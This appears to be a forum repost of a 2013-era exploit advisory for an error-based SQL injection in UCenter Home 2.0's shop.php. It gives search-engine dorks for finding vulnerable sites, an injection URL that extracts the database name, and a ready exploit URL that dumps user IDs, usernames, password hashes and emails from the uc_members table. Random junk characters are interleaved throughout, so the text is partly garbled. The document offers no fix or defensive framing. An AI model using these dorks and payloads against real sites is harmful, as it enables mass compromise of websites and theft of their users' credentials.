) S2 o' @% `: y+ t
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
7 N* B5 z3 w# T8 P8 L- J+ R, m& L3 C, [
; M' Z: S6 _" C( I1 g
# C+ N7 z9 ]! v. u# O% H*/ Author : KnocKout ; M' P0 Q t: Z' p
6 c5 E, r* m# C
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers . p% n% ?: S& @2 {; ~5 s I
2 y2 n" Y: t) R5 m; g*/ Contact: knockoutr@msn.com 8 b- r! O8 S4 { L% c- K
# w5 C4 G) H( Y# ^9 a
*/ Cyber-Warrior.org/CWKnocKout + l- m( C L5 D8 Q' f& s& S
0 e. S W7 d! D! c8 X
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== / t' H5 j' b% H5 t
a" l: }9 z# k* i* J/ w
Script : UCenter Home " |7 T$ }# Y9 T- q- B% ~& H
) m# V( a2 M4 Z
Version : 2.0
+ ]& M. {+ E! z7 g( o, L3 z7 g# [6 \2 f% a f2 }
Script HomePage : http://u.discuz.net/
' q& C7 e& K; S- H8 c( k8 m3 I0 l. e- A" Y
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 9 q! v7 f2 M# t. h. o: T+ L
3 ?# {: q# o+ H* _, u \Dork : Powered by UCenter inurl:shop.php?ac=view ( B/ \7 s$ m8 C% F" `: d) ?& {
- N* t, _* R! r, m v/ O: N( F w. z
Dork 2 : inurl:shop.php?ac=view&shopid= 5 _% l' T+ b a) X+ t1 o
9 p& [! V- O5 t/ g
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== & k/ T# X/ ?7 @) ^( A, }
0 B. p& q$ @2 @
Vuln file : Shop.php
) T5 N) L/ z7 W! O0 h f3 P
$ e% v# u5 D" `8 ~value's : (?)ac=view&shopid= O/ k/ o/ L# t0 e$ @; j
/ ^1 {* H) `3 |: bVulnerable Style : SQL Injection (MySQL Error Based) $ Q6 E7 D$ Z& W) P* p
6 F* p) D* G6 ?/ P/ G
Need Metarials : Hex Conversion
/ l) r' r* X- d6 o+ K! D: y R3 |8 f3 U& [, P$ ~
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 S& K: B M# t8 u" S8 S! l0 i; m
( [1 N6 Y. r, P' H. t2 A
Your Need victim Database name. ; D+ ]9 K' u5 i7 l, t7 R
" o' _9 ]9 E& S* k4 \- yfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ! s( v* q' y! {5 c& g: |
6 v0 O% A4 N- f' E( }.. + S- L2 V5 e# z0 |
7 l$ K% Y! z. e
DB : Okey.
; f0 p8 C& J6 Y0 s* }6 t3 D! o6 Q
& s& W |# c' @your edit DB `[TARGET DB NAME]`
8 R4 t0 n0 ?( X8 `$ s7 D( D' e. h
Example : 'hiwir1_ucenter' 2 c4 w2 Z' Y/ f7 P) l; P+ c" ]
7 P- r) y O3 J$ ~Edit : Okey.
5 `6 O9 {2 [% \' K6 `' r2 K2 _! l! l* C: I5 x
Your use Hex conversion. And edit Your SQL Injection Exploit.. : Q9 Q2 t A8 @: C) l, T
( l. B6 f# L) `& k$ Y 6 G6 O7 T/ `2 ^5 i: ~3 Q
& ^( M% S" w" b( OExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 5 j0 \/ h1 Y% J% B/ |
|
发表于 2013-2-27 21:31:31
收藏
支持
反对